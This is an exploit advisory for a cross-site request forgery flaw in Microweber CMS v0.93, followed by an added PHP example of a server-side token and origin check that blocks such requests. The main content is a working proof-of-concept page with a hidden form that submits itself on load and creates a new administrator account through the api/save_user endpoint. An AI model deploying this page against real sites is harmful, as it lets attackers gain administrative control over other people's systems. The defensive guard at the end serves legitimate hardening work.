###########################################################
[~] Exploit Title: Microweber CMS v0.93 CSRF Vulnerability
[~] Author: sajith
[~] Version: Microweber CMS v0.93
[~] Vendor Homepage: http://microweber.com/
[~] Vulnerable app link: http://microweber.com/download
###########################################################
[*] The application is vulnerable to CSRF. Below is the POC, which an attacker can
use to create a new user and assign the Admin role to that user.
<html>
<head><title>POC by sajith shetty</title></head>
<body>
<form action="http://127.0.0.1/cms/microweber-0.9343/microweber-master/api/save_user" id="formid" method="post">
<input type="hidden" name="id" value="0"/>
<input type="hidden" name="thumbnail" value=""/>
<input type="hidden" name="username" value="test1"/>
<input type="hidden" name="password" value="mypassword"/>
<input type="hidden" name="email" value="test@testing.com"/>
<input type="hidden" name="first_name" value="abc"/>
<input type="hidden" name="last_name" value="xyz"/>
<input type="hidden" name="is_active" value="y"/>
<input type="hidden" name="is_admin" value="y"/>
<input type="hidden" name="basic_mode" value="n"/>
<input type="hidden" name="api_key" value="1234"/>
</form>
<!-- The form submits itself as soon as the page loads -->
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
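
Added example, not part of the original advisory and not Microweber code: a server-side guard that a state-changing endpoint such as api/save_user can call before acting, so that a cross-site form post like the one above is rejected. The functions csrf_token, same_origin and csrf_check and the csrf_token form field are hypothetical names, and the requests at the end are constructed.

```php
<?php
declare(strict_types=1);
// Added example, not Microweber code; all function and field names are hypothetical.

/** Create the per-session anti-CSRF token once; embed it in every form. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Origin (or Referer as fallback), when sent, must name the requested host. */
function same_origin(array $server): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($source === null) {
        return true; // header absent: the token comparison still decides
    }
    $parts = parse_url($source);
    if (!is_array($parts) || empty($parts['host'])) {
        return false; // e.g. "Origin: null" from a sandboxed frame
    }
    $authority = $parts['host'] . (isset($parts['port']) ? ':' . $parts['port'] : '');
    return strcasecmp($authority, $server['HTTP_HOST'] ?? '') === 0;
}

/** Call before any state change; false means reject the request. */
function csrf_check(array $server, array $post, array $session): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    return ($server['REQUEST_METHOD'] ?? '') === 'POST'
        && same_origin($server)
        && is_string($expected) && $expected !== '' && is_string($given)
        && hash_equals($expected, $given);
}

// Constructed requests: the first mirrors the PoC form (cross-site, no token).
$session = [];
$token = csrf_token($session);
$fields = ['username' => 'test1', 'is_admin' => 'y'];
$host = ['REQUEST_METHOD' => 'POST', 'HTTP_HOST' => '127.0.0.1'];
var_dump(csrf_check($host + ['HTTP_ORIGIN' => 'http://attacker.example'], $fields, $session));
var_dump(csrf_check($host + ['HTTP_ORIGIN' => 'http://127.0.0.1'], $fields + ['csrf_token' => $token], $session));
```

Setting the session cookie's SameSite attribute to Lax or Strict (the samesite option of session_set_cookie_params, PHP 7.3+) complements the token check.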